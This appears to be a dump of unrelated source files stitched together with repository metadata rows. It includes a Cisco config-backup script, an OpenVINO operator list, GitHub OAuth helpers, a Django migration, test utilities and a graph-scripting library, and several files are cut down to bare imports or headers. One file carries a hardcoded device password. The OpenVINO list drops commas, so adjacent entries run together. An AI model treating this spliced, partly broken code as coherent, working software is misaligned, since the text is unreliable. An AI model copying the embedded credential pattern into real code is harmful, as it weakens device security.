device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "C1sco12345", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| 31.702128 | 85 | 0.658389 |
fe6cc530fb4e5b20aac699a77d75b91318a5ca68 | 2,385 | py | Python | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | [
"Apache-2.0"
] | null | null | null | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | [
"Apache-2.0"
] | 105 | 2020-06-04T00:23:29.000Z | 2022-02-21T13:04:33.000Z | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | mpapaj/openvino | 37b46de1643a2ba6c3b6a076f81d0a47115ede7e | [
"Apache-2.0"
] | 1 | 2020-10-23T06:45:11.000Z | 2020-10-23T06:45:11.000Z | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1'
'FloorMod-1'
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1'
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1'
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| 20.211864 | 58 | 0.568134 |
fe6ce225addf6075e565169dfeb40c47ef8bca4d | 18,542 | py | Python | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
| 36.936255 | 99 | 0.584349 |
fe6de4a21365edf7ffd30ec000387c588b119366 | 9,086 | py | Python | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | 8 | 2020-09-16T05:28:33.000Z | 2020-09-28T06:29:03.000Z | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
| 75.716667 | 499 | 0.637134 |
fe6f28fa08fad0c5dcac3f523f0415850eb9e77c | 3,495 | py | Python | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 3 | 2017-02-05T06:58:28.000Z | 2017-05-12T07:28:53.000Z | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 720 | 2017-02-08T04:04:19.000Z | 2021-09-14T14:04:56.000Z | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 14 | 2017-02-08T03:57:24.000Z | 2019-10-28T12:14:49.000Z | import pytest
import gen
from dcos_installer import cli
| 34.60396 | 76 | 0.571674 |
fe70b613f1b25d8770820b6d2050c23b8fcae093 | 47,242 | py | Python | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 12 | 2016-11-11T13:24:48.000Z | 2022-01-27T19:49:36.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2017-01-05T14:23:59.000Z | 2018-09-20T19:14:57.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2019-11-25T18:17:00.000Z | 2020-06-04T21:38:50.000Z | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
| 35.870919 | 203 | 0.460522 |
fe7228704cb0dda0e1c0b7305078fa094d1a0478 | 2,843 | py | Python | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | 2 | 2019-10-17T05:36:51.000Z | 2020-06-30T00:27:22.000Z | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | null | null | null | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
| 30.902174 | 74 | 0.655645 |
fe739da7293d52a3a7c4940166ba21b32df8a642 | 9,107 | py | Python | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | 5 | 2015-08-13T05:22:54.000Z | 2018-08-28T14:14:55.000Z | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | null | null | null | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <grabner@cadit.com>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| 41.584475 | 88 | 0.533326 |
fe74b07194e48e39b48840554a34c0fb3e4605a4 | 13,815 | py | Python | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
| 57.086777 | 78 | 0.668983 |
fe759c78dfaceadf537006e1685f7155df52a71a | 10,073 | py | Python | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 6 | 2020-04-21T12:16:19.000Z | 2022-02-10T09:18:08.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 1 | 2021-12-07T13:09:53.000Z | 2021-12-07T13:09:53.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 2 | 2021-03-30T12:40:01.000Z | 2021-11-23T15:49:50.000Z | #! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
| 54.448649 | 111 | 0.37119 |
fe75c11d0a13c6adf86f05d6ce0d9f94ca54fb9c | 5,410 | py | Python | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | 1 | 2020-06-05T23:25:03.000Z | 2020-06-05T23:25:03.000Z | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | null | null | null | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | null | null | null | import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
